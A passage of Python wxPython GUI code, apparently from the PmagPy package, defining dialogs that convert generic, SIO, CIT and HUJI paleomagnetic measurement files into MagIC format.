wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n # unique because only accepts 1 experiment type\n TEXT=\"Experiment:\"\n self.bSizer2 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL)\n self.gridBSizer = wx.GridBagSizer(5, 10)\n self.label1 = wx.StaticText(pnl, label=TEXT)\n self.experiments_names=['Demag (AF and/or Thermal)','Paleointensity-IZZI/ZI/ZI','ATRM 6 positions','AARM 6 positions','cooling rate','TRM']\n self.protocol_info = wx.ComboBox(self.panel, -1, self.experiments_names[0], size=(300,25),choices=self.experiments_names, style=wx.CB_READONLY)\n self.gridBSizer.Add(self.label1, (0, 0))\n self.gridBSizer.Add(self.protocol_info, (1, 0))\n self.bSizer2.Add(self.gridBSizer, wx.ALIGN_LEFT)\n #\n self.Bind(wx.EVT_COMBOBOX, self.on_select_protocol, self.protocol_info)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate, format is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n # unique because only allows 4 choices (most others have ncn choices)\n self.bSizer4 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.sample_naming_conventions=['sample=specimen','no. of initial characters','no. of terminal characters','character delimited']\n self.sample_naming_convention = wx.ComboBox(self.panel, -1, self.sample_naming_conventions[0], size=(250,25), choices=self.sample_naming_conventions, style=wx.CB_READONLY)\n self.sample_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n gridbSizer4 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer4.AddMany( [(wx.StaticText(self.panel,label=\"specimen-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.sample_naming_convention,wx.ALIGN_LEFT),\n (self.sample_naming_convention_char,wx.ALIGN_LEFT)])\n #bSizer4.Add(self.sample_specimen_text,wx.ALIGN_LEFT)\n self.bSizer4.AddSpacer(10)\n self.bSizer4.Add(gridbSizer4,wx.ALIGN_LEFT)\n\n #---sizer 5 ----\n self.bSizer5 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.site_naming_conventions=['site=sample','no. of initial characters','no. of terminal characters','character delimited']\n self.site_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n self.site_naming_convention = wx.ComboBox(self.panel, -1, self.site_naming_conventions[0], size=(250,25), choices=self.site_naming_conventions, style=wx.CB_READONLY)\n gridbSizer5 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer5.AddMany( [(wx.StaticText(self.panel,label=\"site-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.site_naming_convention,wx.ALIGN_LEFT),\n (self.site_naming_convention_char,wx.ALIGN_LEFT)])\n self.bSizer5.AddSpacer(10)\n self.bSizer5.Add(gridbSizer5,wx.ALIGN_LEFT)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n #self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border=5)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_select_protocol(self, event):\n if self.protocol_info.GetValue() == \"cooling rate\":\n self.bSizer2a.ShowItems(True)\n else:\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n # generic_magic.py -WD WD - f FILE -fsa er_samples.txt -F OUTFILE.magic -exp [Demag/PI/ATRM 6/AARM 6/CR -samp X Y -site X Y -loc LOCNAME -dc B PHI THETA [-A] -WD path\n options = {}\n\n ErrorMessage = \"\"\n #-----------\n if not self.bSizer0.file_path.GetValue():\n pw.simple_warning('You must provide a generic format file')\n return False\n FILE = str(self.bSizer0.file_path.GetValue())\n options['magfile'] = FILE\n\n #-----------\n # WD=\"/\".join(FILE.split(\"/\")[:-1])\n WD=self.WD\n options['dir_path'] = WD\n input_dir = os.path.split(FILE)[0]\n magicoutfile=os.path.split(FILE)[1]+\".magic\"\n options['meas_file'] = magicoutfile\n print(\"magicoutfile\", magicoutfile)\n OUTFILE=os.path.join(self.WD,magicoutfile)\n #-----------\n #OUTFILE=self.WD+\"/\"+FILE.split('/')[-1]+\".magic\"\n #-----------\n EXP = \"\"\n exp = str(self.protocol_info.GetValue())\n if exp == 'Demag (AF and/or Thermal)':\n EXP = 'Demag'\n elif exp == 'Paleointensity-IZZI/ZI/ZI':\n EXP = 'PI'\n elif exp == 'ATRM 6 positions':\n EXP ='ATRM 6'\n elif exp == 'AARM 6 positions':\n EXP = 'AARM 6'\n elif exp == 'cooling rate':\n cooling = self.cooling_rate.GetValue()\n if not cooling:\n text = \"You must provide cooling rate for this experiment type!\\nThe format is: xxx, yyy,zzz...\\nThis should be cooling rates in [K/minutes], seperated by comma, ordered at the same order as XXX.10,XXX.20 ...XX.70\"\n pw.simple_warning(text)\n return False\n EXP = 'CR {}'.format(cooling)\n if 'CR' in EXP:\n options['experiment'], options['cooling_times_list'] = EXP.split()\n elif 'AARM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['aarm_n_pos'] = EXP.split()\n elif 'ATRM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['atrm_n_pos'] = EXP.split()\n else:\n options['experiment'] = EXP\n #-----------\n SAMP=\"1 0\" #default\n\n samp_naming_convention = str(self.sample_naming_convention.GetValue())\n try:\n samp_naming_convention_char=int(self.sample_naming_convention_char.GetValue())\n except:\n samp_naming_convention_char = \"0\"\n\n if samp_naming_convention == 'sample=specimen':\n SAMP = \"1 0\"\n elif samp_naming_convention == 'no. of initial characters':\n SAMP = \"0 %i\" % int(samp_naming_convention_char)\n elif samp_naming_convention == 'no. of terminal characters':\n SAMP = \"1 %s\" % samp_naming_convention_char\n elif samp_naming_convention == 'character delimited':\n SAMP = \"2 %s\" % samp_naming_convention_char\n\n options['sample_nc'] = SAMP.split()\n #-----------\n\n SITE = \"1 0\" #default\n\n site_naming_convention = str(self.site_naming_convention.GetValue())\n try:\n site_naming_convention_char = int(self.site_naming_convention_char.GetValue())\n except:\n site_naming_convention_char = \"0\"\n\n if site_naming_convention == 'sample=specimen':\n SITE = \"1 0\"\n elif site_naming_convention == 'no. of initial characters':\n SITE = \"0 %i\" % int(site_naming_convention_char)\n elif site_naming_convention == 'no. of terminal characters':\n SITE = \"1 %s\" % site_naming_convention_char\n elif site_naming_convention == 'character delimited':\n SITE = \"2 %s\" % site_naming_convention_char\n\n options['site_nc'] = SITE.split()\n\n #-----------\n\n LOC = str(self.bSizer6.return_value())\n if LOC!=\"\": options['location'] = LOC\n\n if str(self.bSizer6.return_value()) != \"\":\n LOC=\"-loc \\\"%s\\\"\"%LOC\n else:\n LOC=\"\"\n\n #-----------\n\n LABFIELD=\" \"\n try:\n B_uT, DEC, INC = self.bSizer3.return_value().split()\n except ValueError:\n B_uT, DEC, INC = '0', '0', '0'\n\n #print \"B_uT, DEC, INC\", B_uT, DEC, INC\n options['labfield'], options['labfield_phi'], options['labfield_theta'] = B_uT, DEC, INC\n\n if EXP != \"Demag\":\n LABFIELD=\"-dc \" +B_uT+ \" \" + DEC + \" \" + INC\n\n #-----------\n\n #try: lat,lon = self.bSizer7.return_value().split()\n #except ValueError: lat,lon = '',''\n #options['lat'] = lat\n #options['lon'] = lon\n #lat = '-lat ' + lat\n #lon = '-lat ' + lon\n\n #-----------\n\n DONT_AVERAGE = \" \"\n if not self.bSizer8.return_value():\n DONT_AVERAGE = \"-A\"\n options['noave'] = 1\n else:\n options['noave'] = 0\n\n #-----------\n # some special\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options['spec_file'] = SPEC_OUTFILE\n options['samp_file'] = SAMP_OUTFILE\n options['site_file'] = SITE_OUTFILE\n options['loc_file'] = LOC_OUTFILE\n\n COMMAND=\"generic_magic.py -WD %s -f %s -fsa er_samples.txt -F %s -exp %s -samp %s -site %s %s %s %s -Fsp %s -Fsa %s -Fsi %s -Flo %s \"\\\n %(WD,FILE,OUTFILE,EXP,SAMP,SITE,LOC,LABFIELD,DONT_AVERAGE, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE)#, lat, lon)\n\n print(\"-I- Running Python command:\\n %s\"%COMMAND)\n program_run, error_message = convert.generic(**options)\n\n if program_run:\n pw.close_window(self, COMMAND, OUTFILE)\n else:\n pw.simple_warning(error_message)\n return False\n\n self.Destroy()\n self.parent.Raise()\n\n #def on_cancelButton(self,event):\n # self.Destroy()\n # self.parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.generic.__doc__)\n\n def get_sample_name(self, specimen, sample_naming_convenstion):\n if sample_naming_convenstion[0] == \"sample=specimen\":\n sample = specimen\n elif sample_naming_convenstion[0] == \"no. of terminal characters\":\n n = int(sample_naming_convenstion[1]) * -1\n sample = specimen[:n]\n elif sample_naming_convenstion[0] == \"character delimited\":\n d = sample_naming_convenstion[1]\n sample_splitted = specimen.split(d)\n if len(sample_splitted) == 1:\n sample = sample_splitted[0]\n else:\n sample = d.join(sample_splitted[:-1])\n return sample\n\n def get_site_name(self, sample, site_naming_convention):\n if site_naming_convention[0] == \"site=sample\":\n site = sample\n elif site_naming_convention[0] == \"no. of terminal characters\":\n n = int(site_naming_convention[1])*-1\n site = sample[:n]\n elif site_naming_convention[0] == \"character delimited\":\n d = site_naming_convention[1]\n site_splitted = sample.split(d)\n if len(site_splitted) == 1:\n site = site_splitted[0]\n else:\n site = d.join(site_splitted[:-1])\n\n return site\n\nclass convert_SIO_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n convert SIO formatted measurement file to MagIC formated files\n \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n TEXT = \"SIO Format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n# bSizer_info.Add(wx.StaticText(self), wx.ALIGN_LEFT)\n\n self.bSizer0 = pw.choose_file(pnl, method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.experiment_type(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.specimen_n(pnl)\n\n #---sizer 4a ----\n self.bSizer4a = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ----\n #self.bSizer11 = pw.site_lat_lon(pnl)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 9 ----\n\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n #self.bSizer10 = pw.synthetic(pnl)\n\n #---sizer 10 ---\n TEXT = \"cooling rates [K/minutes] (seperated by comma) for cooling rate experiment:\"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ----\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer5, flag=wx.ALIGN_LEFT)\n #hbox0.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox1 =wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer8, flag=wx.ALIGN_LEFT)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n hbox2 =wx.BoxSizer(wx.HORIZONTAL)\n hbox2.Add(self.bSizer10, flag=wx.ALIGN_LEFT|wx.LEFT, border=5)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer4a, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hbox2, flag=wx.ALIGN_LEFT|wx.TOP, border=8)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n SIO_file = self.bSizer0.return_value()\n if not SIO_file:\n pw.simple_warning('You must provide a SIO format file')\n return False\n options_dict['mag_file'] = str(SIO_file)\n magicoutfile=os.path.split(SIO_file)[1]+\".magic\"\n outfile =os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = str(outfile)\n user = self.bSizer1.return_value()\n options_dict['user'] = str(user)\n if user:\n user = \"-usr \" + user\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = str(experiment_type)\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if not lab_field.strip():\n lab_field = \"\"\n options_dict['labfield'] = 0\n options_dict['phi'] = 0\n options_dict['theta'] = 0\n else:\n lab_field_list = str(lab_field).split()\n options_dict['labfield'] = lab_field_list[0]\n options_dict['phi'] = lab_field_list[1]\n options_dict['theta'] = lab_field_list[2]\n lab_field = \"-dc \" + lab_field\n spc = self.bSizer4.return_value()\n options_dict['specnum'] = spc\n ncn = self.bSizer4a.return_value()\n options_dict['samp_con'] = ncn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = str(loc_name)\n if loc_name:\n loc_name = \"-loc \" + loc_name\n instrument = self.bSizer6.return_value()\n options_dict['instrument'] = str(instrument)\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = 0\n else:\n options_dict['noave'] = 1\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n peak_AF = self.bSizer8.return_value()\n if not peak_AF:\n peak_AF = 0\n options_dict['peakfield'] = peak_AF\n if peak_AF:\n peak_AF = \"-ac \" + peak_AF\n coil_number = self.bSizer9.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n cooling_rates=\"\"\n cooling_rates = self.bSizer10.return_value()\n options_dict['cooling_rates'] = cooling_rates\n\n lat, lon = '', ''\n #try: lat,lon = self.bSizer11.return_value().split()\n #except ValueError: pass\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lat ' + lon\n\n # Force -A option on cooling rate correction experiment\n if cooling_rates !=\"\" and experiment_type ==\"-LP CR\":\n replicate = '-A'\n options_dict['noave'] = 1\n\n SPEC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_specimens.txt\"\n SAMP_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_samples.txt\"\n SITE_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_sites.txt\"\n LOC_OUTFILE = magicoutfile[:magicoutfile.find('.')] + \"_locations.txt\"\n options_dict['spec_file'] = SPEC_OUTFILE\n options_dict['samp_file'] = SAMP_OUTFILE\n options_dict['site_file'] = SITE_OUTFILE\n options_dict['loc_file'] = LOC_OUTFILE\n\n COMMAND = \"sio_magic.py -F {0} -Fsp {1} -Fsa {2} -Fsi {3} -Flo {4} -f {5} -spc {6} -ncn {7} {8} {9} {10} {11} {12} {13} {14} {15} {16}\".format(outfile, SPEC_OUTFILE, SAMP_OUTFILE, SITE_OUTFILE, LOC_OUTFILE, SIO_file, spc, ncn, user, experiment_type, cooling_rates, loc_name, lab_field, peak_AF, coil_number, instrument, replicate)#, lat, lon)\n print(\"COMMAND\", COMMAND)\n # to run as module:\n if convert.sio(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.sio.__doc__)\n\n\nclass convert_CIT_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"Class that converts CIT files magnetometer files into MagIC format for analysis and archiving\"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"CIT Format file (.sam)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n TEXT=\"Measurer (optional):\"\n self.bSizer1 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 2 ----\n self.bSizer2 = pw.sampling_particulars(pnl)\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.specimen_n(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n self.bSizer7.replicate_rb2.SetValue(True)\n\n #---sizer 9 ----\n TEXT=\"Number of measurement orientations (default=8)\"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a CIT format file')\n return False\n input_directory, CIT_file = os.path.split(full_file)\n options_dict['magfile'] = CIT_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = CIT_file + \".magic\"\n options_dict['meas_file'] = outfile\n samp_outfile = CIT_file[:CIT_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n spec_outfile = CIT_file[:CIT_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n site_outfile = CIT_file[:CIT_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = CIT_file[:CIT_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options_dict['user'] = user\n dc_flag,dc_params = '',''\n if self.bSizer3.return_value() != '':\n dc_params = self.bSizer3.return_value().split()\n options_dict['labfield'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc'\n if user:\n user = \"-usr \" + user\n spec_num = self.bSizer5.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer6.return_value()\n options_dict['locname'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer2.return_value()\n options_dict['methods'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n replicate = self.bSizer7.return_value()\n if replicate:\n options_dict['noave'] = False\n replicate = ''\n else:\n options_dict['noave'] = True\n replicate = '-A'\n\n meas_n_orient = self.bSizer9.return_value()\n if meas_n_orient!='':\n try:\n int(meas_n_orient)\n options_dict['meas_n_orient'] = meas_n_orient\n except ValueError:\n pw.simple_warning(\"value for number of measured orienations must be a positive integer\")\n\n COMMAND = \"cit_magic.py -WD {} -f {} -F {} {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -mno {}\".format(wd, CIT_file, outfile, particulars, spec_num, loc_name, user, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dc_params, meas_n_orient)\n # to run as module:\n program_ran, error_message = convert.cit(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.cit.__doc__)\n\n\nclass convert_HUJI_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"HUJI format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n TEXT = \"HUJI sample orientation data file (Optional)\"\n bSizer_infoA = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_infoA.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0A ----\n self.bSizer0A = pw.choose_file(pnl, 'add', method = self.on_add_dat_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'NRM only', 'TRM acquisition', 'Anisotropy experiment', 'Cooling rate experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n #for box in self.bSizer2.boxes:\n # self.Bind(wx.EVT_CHECKBOX, self.on_select_protocol, box)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate (required only for cooling rate type experiments)\\nformat is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ---\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ----\n self.bSizer5 = pw.select_ncn(pnl)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ---\n #TEXT = \"peak AF field (mT) if ARM: \"\n #self.bSizer7 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(bSizer_infoA, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0A, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n 